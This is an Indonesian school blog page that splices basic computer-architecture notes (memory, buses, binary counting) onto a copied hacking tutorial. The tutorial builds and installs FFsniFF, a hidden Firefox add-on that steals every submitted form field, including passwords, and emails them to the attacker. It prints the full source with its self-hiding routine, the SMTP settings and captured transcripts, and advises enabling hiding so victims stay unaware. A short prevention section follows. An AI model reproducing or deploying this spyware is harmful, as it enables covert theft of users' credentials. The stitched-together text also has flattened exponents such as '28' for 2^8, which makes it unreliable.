b. DDR2 SDRAM atau Double Data Rate 2 Synchronous DRAM (Double Data Rate 2 Synchronous
Dynamic Random Access Memory)
c. RDRAM atau Rambus DRAM (Rambus Dynamic Random Access Memory).

* Register prosesor
* Perangkat penyimpanan berbasis disk magnetis, misalnya Harddisk, dan Floppy Disk.
* Perangkat penyimpanan berbasis disk optik
* Memori yang hanya dapat dibaca atau ROM (Read Only Memory)
* Flash Memory
* Punched Card (kuno)
* CD atau Compact Disk
* DVD

Dalam bahasan arsitektur komputer (seperti arsitektur Von Neumann) memori ini dibeda-bedakan atau dikelompokkan hingga membentuk hirarki memori yang disusun berdasarkan kecepatan dan kapasitas memorinya. Susunan hirarki memori ini dimulai dari jenis memori yang paling cepat hingga yang paling lambat, dan disusun dari jenis memori yang paling kecil kapasitasnya hingga yang paling besar kapasitasnya, serta diurutkan berdasarkan nilai tiap bit memorinya, dimulai dari yang nilainya paling tinggi (harga mahal) hingga yang nilainya paling rendah (harga murah).

Pengertian bus, bit dan byte

Pada motherboard terdapat saluran-saluran penghubung yang menghubungkan satu komponen dengan komponen lainnya. Saluran penghubung ini berupa garis-garis yang tercetak pada PCB motherboard. Melalui saluran-saluran inilah data, informasi, dan instruksi-instruksi yang diberikan pada komputer ditransfer/melintas dari komponen satu ke komponen lainnya. Data dan instruksi tersebut diangkut dalam wujud sinyal-sinyal elektronis yang mempunyai makna tertentu. Sekelompok saluran yang mempunyai fungsi yang sama disebut jalur atau bus. Saluran-saluran penghubung tadi disebut pula dengan istikah konduktor.TKJ-SMK NASIONAL DEPOK

Pada permukaan bagian bawah prosesor Intel Pentium 4 socket 478, terdapat kaki-kaki berupa pin. Jumlah pin keseluruhan sebanyak 478 buah, itulah sebabnya disebut soket 478. Pin-pin ini bertugas sebagai lintasan yang menyalurkan data atau instruksi dari motherboard ke processor atau sebaliknya. Dengan demikian, di dalam sebuah prosesor juga ada saluran-saluran tempat lalulintas data/informasi/instruksi-instruksi yang harus diolah/diproses dan dikirim kembali ke motherboard. Pin-pin pada prosesor adalah salah satu contoh nyata yang secara fisik terlihat sebagai saluran tempat lalu lintas data/informasi/instruksi. Sekelompok saluran yang mempunyai fungsi yang sama juga disebut jalur atau bus. Hal yang sama juga ada di video card atau periferal lainnya. Bus-bus atau jalur-jalur pada prosesor secara garis besar dapat dibagi menjadi data bus (jalur data), address bus (jalur adres), dan control bus (jalur kontrol). Control bus disebut juga dengan istilah signal bus.
Pengertian jalur tidak sama dengan saluran. Dalam hal ini, jalur adalah kata jamak dari saluran. Pahamilah penjelasan berikut ini:
Jalur data (data bus) terdiri dari beberapa (sejumlah) saluran data
Jalur adres (address bus) terdiri dari beberapa (sejumlah) saluran adres
Jalur kontrol (control bus) terdiri dari beberapa (sejumlah) saluran kontrol

Seperti telah dijelaskan sebelumnya, bahwa data/informasi/instruksi disalurkan dalam wujud sinyal-sinyal elektronis. Hal ini dapat dijelaskan sebagai berikut:
Setiap satu saluran (satu kawat) pada saat-saat tertentu hanya dapat berada dalam satu kondisi, yaitu ada tegangan atau tidak ada tegangan. Dikatakan ada tegangan jika tegangannya berkisar 2,5 Volt hingga 5,5 Volt. Dikatakan tidak ada tegangan jika tegangannya berkisar 0 Volt hingga 0,8 Volt. Keadaan ada tegangan disimbolkan dengan angka 1 dan disebut dengan istilah ‘high’, keadaan tidak ada tegangan disimbolkan dengan angka 0 dan disebut dengan istilah ‘low’.
Berdasar penjelasan ini, dapat dikatakan bahwa setiap saluran selalu berkeadaan biner (dua kemungkinan), yaitu dalam keadaan ‘0’ atau dalam keadaan ‘1’. Simbol angka yang hanya bernotasi ‘0’ dan ‘1’ ini disebut dengan istilah notasi digit biner, dalam bahasa Inggris disebut binary digit yang disingkat dengan istilah ’bit’.
Misalkan jalur data (data bus) sebuah prosesor terdiri dari 8 saluran, setiap saluran berada dalam kondisi ‘0’ atau ‘1’, maka akan terjadi banyak kemungkinan kombinasi bilangan biner yang menyimbulkan kondisi tegangan seperti berikut ini:
saluran
Total kombinasi bilangan biner yang mungkin terjadi adalah 28 = 256 macam kombinasi.
Mungkin pola tegangan : 0 0 0 0 0 0 0 1 akan membentuk huruf (karakter) A
sedangkan pola tegangan: 0 0 0 0 0 0 1 1 akan membentuk angka (karakter) 1
Demikian seterusnya hingga tercipta 256 karakter (notasi) yang berbeda.
character
Kumpulan dari 8 bilangan biner (bit) yang membentuk pola urutan (kombinasi) tertentu ini disebut byte. Sehingga dapat disebut 1 byte = 8 bit. 1 byte nilainya setara dengan 1 karakter.
Byte ini akhirnya dipakai sebagai satuan, misalnya untuk menyatakan kapasitas sebuah media simpan (harddisk, disket, flash disk, CD, dan lainnya), kapasitas memory dan lain-lainnya. Dikenal pula satuan kilo byte, mega byte, giga byte, dan terra byte dengan kesetaraan nilai sebagai berikut:
1 kilo bayte (KB) = 1024 byte
1 mega byte (MB) = 1024 x1024 byte
1 giga byte (GB) = 1024 x1024 x1024 byte
1 terra byte (TB) = 1024 x1024 x1024 x1024 byte
alu
Gambar 1. Ilustrasi bus pada prosesor.
Sampai saat ini teknologi prosesor terus berkembang. Pada awalnya, Intel memproduksi prosesor 4 bit, kemudian prosesor 8 bit, 16 bit, 32 bit dan sekarang ini 64 bit. Sebuah prosesor dikatakan prosesor 4 bit jika bekerja menggunakan data 4 bit, artinya jalur datanya (data bus-nya) terdiri dari 4 saluran data. Dengan demikian, prosesor 64 bit menggunakan 64 saluran untuk jalur datanya (data bus-nya terdiri dari 64 saluran).

SISTEM BILANGAN BINER

Sistem bilangan biner atau sistem bilangan basis dua adalah sebuah sistem penulisan angka dengan menggunakan dua simbol yaitu 0 dan 1. Sistem bilangan biner modern ditemukan oleh Gottfried Wilhelm Leibniz pada abad ke-17. Sistem bilangan ini merupakan dasar dari semua sistem bilangan berbasis digital. Dari sistem biner, kita dapat mengkonversinya ke sistem bilangan Oktal atau Hexadesimal. Sistem ini juga dapat kita sebut dengan istilah bit, atau Binary Digit. Pengelompokan biner dalam komputer selalu berjumlah 8, dengan istilah 1 Byte/bita. Dalam istilah komputer, 1 Byte = 8 bit. Kode-kode rancang bangun komputer, seperti ASCII, American Standard Code for Information Interchange menggunakan sistem peng-kode-an 1 Byte. tkj-smk nasional depok


20=1
21=2
22=4
23=8
24=16
25=32
26=64
dst

[sunting] Perhitungan

Desimal Biner (8 bit)
0 0000 0000
1 0000 0001
2 0000 0010
3 0000 0011
4 0000 0100
5 0000 0101
6 0000 0110
7 0000 0111
8 0000 1000
9 0000 1001
10 0000 1010
11 0000 1011
12 0000 1100
13 0000 1101
14 0000 1110
15 0000 1111
16 0001 0000
Perhitungan dalam biner mirip dengan menghitung dalam sistem bilangan lain. Dimulai dengan angka pertama, dan angka selanjutnya. Dalam sistem bilangan desimal, perhitungan mnggunakan angka 0 hingga 9, sedangkan dalam biner hanya menggunakan angka 0 dan 1.
contoh: mengubah bilangan desimal menjadi biner
desimal = 10.
berdasarkan referensi diatas yang mendekati bilangan 10 adalah 8 (23), selanjutnya hasil pengurangan 10-8 = 2 (21). sehingga dapat dijabarkan seperti berikut
10 = (1 x 23) + (0 x 22) + (1 x 21) + (0 x 20).
dari perhitungan di atas bilangan biner dari 10 adalah 1010
dapat juga dengan cara lain yaitu 10 : 2 = 5 sisa 0 (0 akan menjadi angka terakhir dalam bilangan biner), 5(hasil pembagian pertama) : 2 = 2 sisa 1 (1 akan menjadi angka kedua terakhir dalam bilangan biner), 2(hasil pembagian kedua): 2 = 1 sisa 0(0 akan menjadi angka ketiga terakhir dalam bilangan biner), 1 (hasil pembagian ketiga): 2 = 0 sisa 1 (0 akan menjadi angka pertama dalam bilangan biner) karena hasil bagi sudah 0 atau habis, sehingga bilangan biner dari 10 = 1010
atau dengan cara yang singkat 10:2=5(0),5:2=2(1),2:2=1(0),1:2=0(1)sisa hasil bagi dibaca dari belakang menjadi 1010

Menjaring Password dengan Firefox Sniffer-TKJ SMK NASIONAL DEPOK

Cara Menjaring Password dengan Firefox Sniffer-
Dalam artikel ini saya akan menunjukkan simulasi penyadapan password di browser korban dan mengirimkan hasil sadapannya ke email saya di ilmuhacking.com. Setelah itu saya akan jelaskan cara kerja FFsniFF dengan membedah source codenya.

Sekilas tentang addon Firefox
Addon firefox adalah program dalam javascript yang diload dan diaktifkan setiap firefox dijalankan. Addon ini diperlukan untuk melakukan hal-hal yang tidak disediakan oleh firefox (firefox hanya menyediakan fungsi-fungsi dasar saja). Antarmuka addon ada yang berbentuk ikon di status bar, toolbar atau boleh juga tidak memiliki antarmuka sama sekali. FFsniFF adalah contoh addon yang tidak memiliki antarmuka pengguna sama sekali, hal ini bisa dimaklumi karena memang addon ini harus bersifat stealth.
Addon dipaketkan dan disebarkan dalam bentuk file ZIP, namun ekstensi filenya bukan zip melainkan XPI (dibaca “zippy”). Dalam file xpi tersebut ada banyak file dan folder lain seperti source code javascript, gambar dan file xml deskriptor. File-file yang umumnya ada dalam sebuah paket zippy adalah:
1
2
3
4
5
6
7
8
9
10
11
exampleExt.xpi:
              /install.rdf                   
              /components/*  
              /components/cmdline.js                   
              /defaults/
              /defaults/preferences/*.js     
              /plugins/*                        
              /chrome.manifest                
              /chrome/icons/default/*       
              /chrome/
              /chrome/content/
install.rdf adalah deskriptor untuk keperluan instalasi. Selain itu di dalam paket itu juga ada file javascript yang berisi kode program yang menjalankan fungsi addon. Selebihnya adalah file-file untuk menangani user interface addon.
Membuat paket instalasi ffsniff.xpi
Langkah awal saya harus membuat paket instalasi addon ffsniff.xpi. Untuk itu saya harus mengunduh file sumber FFsniFF dari http://azurit.elbiahosting.sk/ffsniff/. Setelah diunduh, file tar.gz itu harus dimekarkan. Isi dari paket itu setelah dimekarkan adalah:
1
2
3
4
5
6
7
8
9
pkg_creator.py
src/
src/install.rdf
src/chrome/
src/chrome/content/
src/chrome/content/ffsniff/
src/chrome/content/ffsniff/ffsniffOverlay.xul
src/chrome/content/ffsniff/ffsniffOverlay_orig.js
src/chrome/content/ffsniff/contents.rdf
File tar.gz itu tidak bisa langsung diinstall ke firefox karena masih berbentuk kumpulan file yang harus diubah dan dibungkus menjadi paket zippy (xpi). Sebenarnya untuk membuat paket zippy sudah disediakan script pkg_creator.py dalam bahasa python, namun dalam artikel ini saya tidak memakai script itu agar saya bisa menunjukkan bagaimana proses pembuatan file xpi dari source code.
Setelah source berhasil didownload, berikutnya saya harus membuat file ffsniffOverlay.js, caranya adalah dengan mengcopy file ffsniffOverlay_orig.js dalam nama ffsniffOverlay.js. Setelah itu ffsniffOverlay.js akan saya edit untuk mengubah beberapa variabel berikut:
1
2
3
4
5
6
7
var send_from_host = "<SEND_FROM_HOST>";
var send_from = "<SEND_FROM>";
var send_to = "<SEND_TO>";
var subject = "<SUBJECT>";
var smtp_host = "<SMTP_HOST>";
var smtp_port = "<SMTP_PORT>";
var enable_hide = "<HIDDING>";
Konfigurasi smtp untuk @ilmuhacking.com

MX record ilmuhacking.com
MX record ilmuhacking.com
Variabel-variabel tersebut adalah parameter untuk mengirim email melalui smtp. smtp_host berisi alamat smtp server yang dipakai untuk mengirim email. Sebaiknya gunakan smtp server yang bertanggung jawab untuk domain email yang kita tuju, dalam kasus ini domain email tujuan adalah @ilmuhacking.com. Oleh karena itu saya harus mencari smtp server yang bertanggung jawab untuk domain ilmuhacking.com. Cara mencarinya adalah dengan melihat MX record dari DNS ilmuhacking.com. Anda bisa gunakan layanan dnswatch.info untuk mencari MX record ilmuhacking.com. Perhatikan gambar di samping, terlihat bahwa ternyata smtp server untuk ilmuhacking.com berada di host yang sama, jadi smtp_host saya isi dengan ilmuhacking.com. Pada domain lain biasanya mail server adalah mail.domainanda.com.
send_from dan send_to saya isi dengan nilai yang sama, yaitu testing@ilmuhacking.com, alamat itu adalah alamat email asal dan tujuan. Perhatikan bahwa domain email sumber dan tujuan harus dalam domain yang sama (ilmuhacking.com) karena smtp server umumnya tidak bersedia mengirimkan email ke domain lain (istilahnya open relay) bila pengirim tidak memasukkan password dulu (anonymous).
enable_hide sengaja saya isi “no” untuk kemudahan, dalam kasus nyata variabel ini harus diisi dengan “yes” agar tersembunyi dari daftar addon sehingga tidak membuat korban curiga. Bila anda masih coba-coba, sebaiknya isi dulu dengan “no”.
smtp_port adalah port smtp server, port standar untuk layanan smtp adalah 25. subject adalah subject dari email yang akan berisi password korban.
1
2
3
4
5
6
7
var send_from_host = "ilmuhacking.com";
var send_from = "testing@ilmuhacking.com";
var send_to = "testing@ilmuhacking.com";
var subject = "Log Firefox Sniffer";
var smtp_host = "ilmuhacking.com";
var smtp_port = "25";
var enable_hide = "no";
Konfigurasi smtp untuk @telkom.net
Agar lebih memahami tentang konfigurasi email ini, saya beri contoh lain dengan email tujuan ke telkom.net.Dengan cara yang sama saya harus membaca MX record dari domain telkom.net, ternyata MX record untuk telkom.net ada 2: mx1.mail.plasa.com dan mx2.mail.plasa.com. Terserah mau pilih yang mana saja. Karena memakai smtp server telkom.net, email tujuan harus berada di domain @telkom.net, di sini saya pakai rizki.wicaksono@telkom.net. Alamat asal saya isi sama dengan email tujuan. Ini berarti saya mengirim email dari dan ke email yang sama, itu tidak masalah. send_from_host saya isi dengan telkom.net karena ini adalah domain. Jadi konfigurasi smtp untuk email tujuan @telkom.net adalah sebagai berikut:
1
2
3
4
5
6
7
var send_from_host = "telkom.net";
var send_from = "rizki.wicaksono@telkom.net";
var send_to = "rizki.wicaksono@telkom.net";
var subject = "Log Firefox Sniffer";
var smtp_host = "mx1.mail.plasa.com";
var smtp_port = "25";
var enable_hide = "no";
Membuat file ffsniff.jar
Setelah variabel-variabel di file ffsniffOverlay.js sudah diubah, langkah berikutnya adalah membuat file ffsniff.jar. Walaupun ekstensi filenya adalah jar, sebenarnya ini adalah file zip biasa. File-file yang dimasukkan dalam ffsniff.jar adalah:
content/ffsniff/contents.rdf
content/ffsniff/ffsniffOverlay.js
content/ffsniff/ffsniffOverlay.xul
Hasil file ffsniff.jar harus mengikutsertakan folder content/ffsniff, tidak boleh 3 file itu dizip tanpa mengikutsertakan foldernya. Jadi untuk membuat file ffsniff.jar harus berada di parent folder dari content/ffsniff. Anda bebas menggunakan program apa saja untuk kompresi zip ini, saya sendiri memakai WinRAR. Ketika dibuka dengan WINRAR isi dari ffsniff.jar tampak seperti gambar di bawah ini, perhatikan kolom pathnya harus berisi seperti itu.
ffsniff.jar list files
ffsniff.jar list files

Membuat file ffsniff.xpi
Setelah mendapatkan file ffsniff.jar, selanjutnya saya harus membuat paket instalasi ffsniff.xpi. File ini juga file zip biasa, walaupun ekstensinya .xpi. Isi file ffsniff.xpi adalah dua file berikut:
install.rdf
chrome/ffsniff.jar
Jangan lupa juga ffsniff.jar harus dizip dalam folder chrome. Gambar di bawah ini menunjukkan ffsniff.xpi yang dibuka dengan winrar, perhatikan juga kolom pathnya harus tepat seperti itu.
ffsniff.xpi file list
ffsniff.xpi file list

Instalasi Firefox Sniffer
Oke, kini selesai sudah proses pembuatan file instalasi addon FFsniffer. Kini saya bisa menginstall addon tersebut. Cara instalasi file xpi adalah dengan membuka Firefox, kemudian memasukkan path lokasi file xpi pada addressbar firefox. Setelah muncul daftar file di firefox, klik file xpi yang akan diinstall. Cara instalasi FFsniFF diperlihatkan pada gambar di bawah ini. Setelah berhasil install jangan lupa untuk restart firefox anda.
instalasi firefox sniffer
instalasi firefox sniffer
Mencoba login ke yahoo
Kini saya akan mencoba login ke yahoo dengan username rizkiwicaksono. Setelah login, saya periksa inbox email testing@ilmuhacking.com. Ternyata email hasil sniff password ketika login ke yahoo sudah masuk. Isi emailnya terlihat pada gambar di bawah ini.
log sniffer email
log sniffer email
Dalam email tersebut terlihat bahwa FFsniff tidak hanya mencatat username dan password tapi semua field dengan tag input (input type=”xxx”) dari form, yaitu: password field, hidden field, text field, checkbox. Selain itu FFsniff juga mencatat URL, nama field, jenis dan nilainya. FFsniFF hanya mengirimkan field yang ada isinya, bila field tersebut kosong, field tersebut tidak akan dikirim.
Email Sniffer Log
Mari kita perhatikan email yang dikirimkan FFsniFF. Header lengkap email yang dikirim FFsniff adalah sebagai berikut:
1
2
3
4
5
6
7
8
9
Return-path: <testing@ilmuhacking.com>
Envelope-to: testing@ilmuhacking.com
Delivery-date: Fri, 27 Feb 2009 03:23:48 -0600
Received: from [202.43.xxx.xxx] (port=23982 helo=ilmuhacking.com)
     by gator669.hostgator.com with esmtp (Exim 4.69)
     (envelope-from <testing@ilmuhacking.com>)
     id 1Lcywa-0002DK-Jj
     for testing@ilmuhacking.com; Fri, 27 Feb 2009 03:23:48 -0600
Subject: Log Firefox Sniffer
Dalam email tersebut hanya ada 1 header Received, yaitu dari host 202.43.xxx.xxx (ip lengkap saya sensor). Hal ini menunjukkan bahwa smtp server yang saya pakai kebetulan adalah smtp server yang paling dekat dengan si penerima sehingga tidak perlu dioper ke smtp server lain. Berikut ini adalah header email FFsniFF yang dikirim ke telkom.net:
Return-Path: <rizki.wicaksono@telkom.net>
Received: from [125.160.17.193] (HELO mx1.mail.telkom.net)
  by f1.c.plasa.com (CommuniGate Pro SMTP 4.3.9)
  with ESMTPS id 690188427 for rizki.wicaksono@telkom.net; Wed, 04 Mar 2009 11:05:27 +0700
Received: from mx1.mail.plasa.com ([222.124.18.71])
 by mx1.mail.telkom.net  with esmtp id 1LeiKy-0001qP-O1
 for rizki.wicaksono@telkom.net; Wed, 04 Mar 2009 11:04:20 +0700
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: AggYAH+MrUnKK6ce/2dsb2JhbACBTosbIQGGVoIPsFshAQKSPQEDgSwG
X-IronPort-AV: E=McAfee;i="5300,2777,5542"; a="119895912"
Received: from xxxxdtp.net.id (HELO telkom.net) ([202.43.xx.xx])
  by mx1.mail.plasa.com with ESMTP; 04 Mar 2009 11:02:49 +0700
Subject: Log Firefox Sniffer
X-HAM-Check: YES
Date: Wed, 04 Mar 2009 11:05:27 +0700
Message-ID: <auto-000690188427@f1.c.plasa.com>
Dalam email ke telkom.net ada 3 header Received. Yang pertama adalah mx1.mail.plasa.com, ini adalah smtp server yang saya pakai di FFsniFF. Kemudian dari situ email dioper ke mx1.mail.telkom.net, dan terakhir dioper lagi ke f1.c.plasa.com, yang merupakan smtp server yang paling dekat dengan si penerima. Jadi sebenarnya saya bisa juga langsung mengirim email ke telkom.net dengan menggunakan smtp server f1.c.plasa.com. Namun karena MX record telkom.net menunjuk ke mx1.mail.telkom.net lebih baik saya pakai smtp server itu, walaupun perlu dioper sebanyak 2 kali untuk sampai di tujuan.
FFsniff mengirimkan email tersebut secara anonymous, artinya ffsniff tidak melakukan authentication sebelum mengirimkan email. SMTP server tidak mungkin menolak email yang ditujukan untuk domain yang dikelola dirinya sendiri, walaupun pengirimnya adalah anonymous (tanpa authentication), sebab bila smtp server menolak email untuk dirinya sendiri maka orang lain tidak akan bisa mengirim email ke domain itu.
Karena dikirimkan secara anonymous maka email tersebut tidak bisa ditujukan ke domain lain selain ilmuhacking.com karena smtp server tersebut kemungkinan besar akan menolak dijadikan titik relay pengiriman email ke domain lain. Bila ingin mengirimkan email untuk domain lain tidak bisa secara anonymous, sebelumnya harus memasukkan perintah smtp AUTH LOGIN dan memasukkan username/password dalam base64. Saya tidak akan menjelaskan terlalu panjang soal email, di lain kesempatan akan saya bahas detil cara kerja email.
Pencegahan
Bad guys already know about FFsniff since 3 years ago
FFsniff diciptakan pada bulan maret 2006, tepat 3 tahun yang lalu sehingga addon ini sudah dikenal luas sebagai salah satu tools hacking. Sekarang bagaimana caranya agar kita tidak menjadi korban addon ini?
Berikut ini tips agar tidak menjadi korban FFsniff:
  • Jangan sembarangan menginstall addon yang tidak anda kenal. Install addon hanya dari situs resmi Firefox Addon https://addons.mozilla.org/
  • Install Addon hanya dari situs yang menggunakan https. Penggunaan https ini sangat penting agar anda tidak tersesat mengakses situs palsu yang berusaha memberikan anda addon yang sudah diracuni spyware. Mengenai pentingnya https ini bisa anda baca di artikel: understanding https
  • firefox safe mode
    firefox safe mode
  • Bila anda berada di komputer publik, gunakan Firefox dalam Safe Mode (mode aman). Mode ini adalah mode menjalankan firefox dengan mematikan semua addon yang ada.
  • Walaupun FFsniFF dapat menyembunyikan diri dari daftar addon Firefox, namun tetap saja dia tidak mungkin bisa bersembunyi di file system. Jika anda ragu apakah firefox anda bersih dari FFsniFF, silakan buka folder Profile Mozilla Firefox anda. Biasanya di:
  • 1
    C:\Documents and Settings\<username>\Application Data\Mozilla\Firefox\Profiles\<some-random-text>\extensions\
    firefox extension folder
    firefox extension folder
    Kemudian perhatikan file install.rdf, dalam file itu terlihat nama dan deskripsi addon. Atau anda juga bisa melihat folder di dalamnya lagi untuk membaca file dot js dari ffsniff.
    How FFsniff Works
    Saya telah menunjukkan mulai dari mengunduh, menginstall dan kemudian mendapatkan password ketika ada yang login di firefox yang telah dipasang addon ini. Kini saatnya saya menjelaskan cara kerja FFsniff ini. Inti dari FFsniff ini ada pada file ffsniffOverlay.js. File ini berisi semua code yang melakukan sniffing. Berikut adalah source code lengkap ffsniffOverlay.js.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    var transportService = Components.classes["@mozilla.org/network/socket-transport-service;1"].getService(Components.interfaces.nsISocketTransportService);
    var transport = "";
    var outstream = "";
    var instream = Components.classes["@mozilla.org/scriptableinputstream;1"].createInstance(Components.interfaces.nsIScriptableInputStream);
    var stream = "";
    // find out FF version
    var appInfo = Components.classes["@mozilla.org/xre/app-info;1"].getService(Components.interfaces.nsIXULAppInfo);
    var versionChecker = Components.classes["@mozilla.org/xpcom/version-comparator;1"].getService(Components.interfaces.nsIVersionComparator);
     
    var data = "";
    var data0 = "EHLO " + send_from_host + "\r\n"
    var data1 = "MAIL FROM: <" + send_from + ">\r\n"
    var data2 = "RCPT TO: <" + send_to + ">\r\n"
    var data3 = "DATA\r\n"
    var data4 = "\r\n.\r\n"
    var data5 = "QUIT\r\n"
    function send_data() {
     transport = transportService.createTransport(null, 0, smtp_host, smtp_port, null);
     outstream = transport.openOutputStream(0, 0, 0);
     stream = transport.openInputStream(0, 0, 0);
     instream.init(stream);
     
     // this will avoid 'Improper use of SMTP command pipelining'
     // error on SMTP servers
     outstream.write(data0, data0.length);
     while (instream.available() == 0) {}
     instream.read(instream.available());
     
     outstream.write(data1, data1.length);
     while (instream.available() == 0) {}
     instream.read(instream.available());
     
     outstream.write(data2, data2.length);
     while (instream.available() == 0) {}
     instream.read(instream.available());
     
     outstream.write(data3, data3.length);
     while (instream.available() == 0) {}
     instream.read(instream.available());
     
     outstream.write(data, data.length);
     // don't read here cos no data was send to us
     //while (instream.available() == 0) {}
     //instream.read(instream.available());
     
     outstream.write(data4, data4.length);
     while (instream.available() == 0) {}
     instream.read(instream.available());
     
     outstream.write(data5, data5.length);
     while (instream.available() == 0) {}
     
     outstream.close();
     instream.close();
    }
    if (versionChecker.compare(appInfo.version, "3.0") >= 0) {
     var workingThread = function() {
     };
     
     workingThread.prototype = {
      run: function() {
       send_data();
      }
     };
    } else {
     var runnable = {
      run: function() {
       send_data();
      }
     }
    }
    function sniff() {
     // if we are running under 3.0 or later
     if (versionChecker.compare(appInfo.version, "3.0") >= 0) {
      var thread = Components.classes["@mozilla.org/thread-manager;1"].getService().newThread(0);
      thread.dispatch(new workingThread(), thread.DISPATCH_NORMAL);
     } else {
      var thread = Components.classes["@mozilla.org/thread;1"].getService(Components.interfaces.nsIThread);
      thread.init(runnable, 512*1024, Components.interfaces.nsIThread.PRIORITY_NORMAL, Components.interfaces.nsIThread.SCOPE_LOCAL, Components.interfaces.nsIThread.STATE_UNJOINABLE);
     }
    }
     
    function do_sniff() {
     var ok = 0;
     var hesla = window.content.document.getElementsByTagName("input");
     data = "";
     for (var i = 0; i < hesla.length; i++) {
      if (hesla[i].value != "") {
       if (hesla[i].type == "password") {
        ok = 1;
       }
       if (hesla[i].name == "") {
        data += hesla[i].type + ":" + "<blank>:" + hesla[i].value + "\n";
       }
       else {
        data += hesla[i].type + ":" + hesla[i].name +":" + hesla[i].value + "\n";
       }
      }
     }
     if (ok == 1) {
      data = "Subject: " + subject + "\r\n\r\n" + window.top.content.document.location + "\n" + "type:name:value\n" + "---------------\n" + data;
      sniff()
     }
    }
    function hide_me() {
     var RDFService = Components.classes["@mozilla.org/rdf/rdf-service;1"].getService(Components.interfaces.nsIRDFService);
     var Container = Components.classes["@mozilla.org/rdf/container;1"].createInstance(Components.interfaces.nsIRDFContainer);
     var extensionDS = Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).datasource;
     var root = RDFService.GetResource("urn:mozilla:item:root");
     var nameArc = RDFService.GetResource("http://www.mozilla.org/2004/em-rdf#name");
     Container.Init(extensionDS, root);
     var elements = Container.GetElements();
     while (elements.hasMoreElements()) {
      var element = elements.getNext();
      var name = "";
      var target = extensionDS.GetTarget(element, nameArc, true);
      if (target) {
       name = target.QueryInterface(Components.interfaces.nsIRDFLiteral).Value;
       if (name == "FFsniFF") {
        Container.RemoveElement(element, true);
       }
      }
     }
    }
    if (enable_hide == "yes") {
     hide_me();
    }
    window.addEventListener("submit", do_sniff, false);
    Perhatikan baris ke-127 pada source di atas, bila enable_hide diset “yes”, maka ffsniff akan menjalankan fungsi hide_me(). hide_me() bertugas menghilangkan FFsniff dari daftar addon agar kehadirannya tidak disadari pengguna. Cara menyembunyikan diri adalah dengan cara menjalankan fungsi Container.RemoveElement (baris ke-122) hanya bila element itu bernama “FFsniFF”.
    how ffsniff works
    how ffsniff works
    Fungsi sniffing sesungguhnya ada pada baris terakhir. Pada baris terakhir, terdapat fungsi addEventListener(). Fungsi ini berguna untuk mengaitkan event submit dengan fungsi do_sniff. Artinya fungsi do_sniff akan dijalankan setiap kali terjadi event submit. Event submit akan terjadi bila ada request POST di browser, antara lain dengan melalui klik tombol bertipe submit (input type=”submit”). Namun tidak hanya melalui klik saja, submit bisa juga dilakukan oleh javascript. Dengan cara apapun, bila terjadi request POST di browser, event submit akan terjadi, dan artinya fungsi do_sniff juga akan dipanggil. Untuk lebih jelasnya perhatikan gambar di atas.
    Kini fokus perhatian kita pindah ke fungsi do_sniff (baris ke-84). Dalam fungsi sniff, ffsniffer mengambil daftar semua tag <input> yang ada dengan fungsi window.content.document.getElementsByTagName(“input”). Kemudian semua field tersebut akan digabung dalam variabel string data. Hanya bila dalam form tersebut terdapat password field (input type=”password”), maka ffsniffer akan mengirimkan email, bila hanya form biasa (bukan form login), ffsniffer tidak akan mengirim email.
    Bila mengandung password field, berikutnya fungsi sniff (baris ke-73) akan dijalankan. Fungsi sniff ini tugasnya hanya membuat dan menjalankan thread. Thread tersebut bertugas melakukan pengiriman email dengan memanggil fungsi send_data (baris ke-17). Fungsi send_data akan membuka koneksi tcp ke smtp server, kemudian mengirimkan perintah smtp untuk mengirim email. Dengan menggunakan sniffer Wireshark, berikut adalah komunikasi yang terjadi ketika email dikirim ke telkom.net:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    220-mx1.mail.plasa.com ESMTP
    220 UBE, porn, and abusive content not allowed
    EHLO telkom.net
    250-mx1.mail.plasa.com
    250-8BITMIME
    250 SIZE 20971520
    MAIL FROM: <rizki.wicaksono@telkom.net>
    250 sender <rizki.wicaksono@telkom.net> ok
    RCPT TO: <rizki.wicaksono@telkom.net>
    250 recipient <rizki.wicaksono@telkom.net> ok
    DATA
    354 go ahead
    Subject: Log Firefox Sniffer
     
    https://login.yahoo.com/config/login?
    type:name:value
    ---------------
    hidden:.tries:2
    hidden:.intl:us
    hidden:.u:6220o3t4qrv31
    hidden:.v:0
    hidden:.challenge:Uhh09ZXeYC4rgGkrSkirh.TXeHk_
    hidden:hasMsgr:0
    hidden:.chkP:Y
    hidden:.done:http://my.yahoo.com
    hidden:.pd:_ver=0&c=&ivt=&sg=
    text:login:rizkiwicaksono
    password:passwd:inipasswordku
    checkbox:.persistent:y
    submit:.save:Sign In
    .
    250 ok:  Message 119895912 accepted
    221 mx1.mail.plasa.com
    QUIT
    Sedangkan komunikasi yang terjadi ketika email dikirim ke @ilmuhacking.com adalah:
    220-gator669.hostgator.com ESMTP Exim 4.69 #1 Tue, 03 Mar 2009 22:15:33 -0600 
    220-We do not authorize the use of this system to transport unsolicited, 
    220 and/or bulk e-mail.
    EHLO ilmuhacking.com
    250-gator669.hostgator.com Hello ilmuhacking.com [202.43.xxx.xxx]
    250-SIZE 52428800
    250-PIPELINING
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
    MAIL FROM: <testing@ilmuhacking.com>
    250 OK
    RCPT TO: <testing@ilmuhacking.com>
    250 Accepted
    DATA
    354 Enter message, ending with "." on a line by itself
    Subject: Log Firefox Sniffer
     
    https://login.yahoo.com/config/login?
    type:name:value
    ---------------
    hidden:.tries:1
    hidden:.intl:us
    hidden:.u:eljvtc94qs023
    hidden:.v:0
